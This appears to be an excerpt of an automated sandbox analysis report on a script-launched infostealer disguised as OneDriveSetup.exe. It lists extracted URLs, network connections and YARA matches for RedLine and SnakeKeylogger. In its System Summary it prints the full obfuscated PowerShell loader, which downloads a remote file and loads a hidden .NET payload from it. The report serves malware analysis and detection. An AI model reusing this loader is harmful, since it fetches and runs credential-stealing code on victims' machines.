                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: wscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/UqB
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/MQJcS
                  Source: wscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/MQJcSRqM
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/MQJcS
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BDA000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.8:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 6.2.OneDriveSetup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00408C606_2_00408C60
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040DC116_2_0040DC11
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00407C3F6_2_00407C3F
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00418CCC6_2_00418CCC
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00406CA06_2_00406CA0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004028B06_2_004028B0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041A4BE6_2_0041A4BE
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004182446_2_00418244
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004016506_2_00401650
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00402F206_2_00402F20
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004193C46_2_004193C4
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004187886_2_00418788
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00402F896_2_00402F89
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00402B906_2_00402B90
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004073A06_2_004073A0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851586F6_2_0851586F
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851C9806_2_0851C980
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851CC586_2_0851CC58
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_08512EF86_2_08512EF8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851EEE06_2_0851EEE0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_08516EA86_2_08516EA8
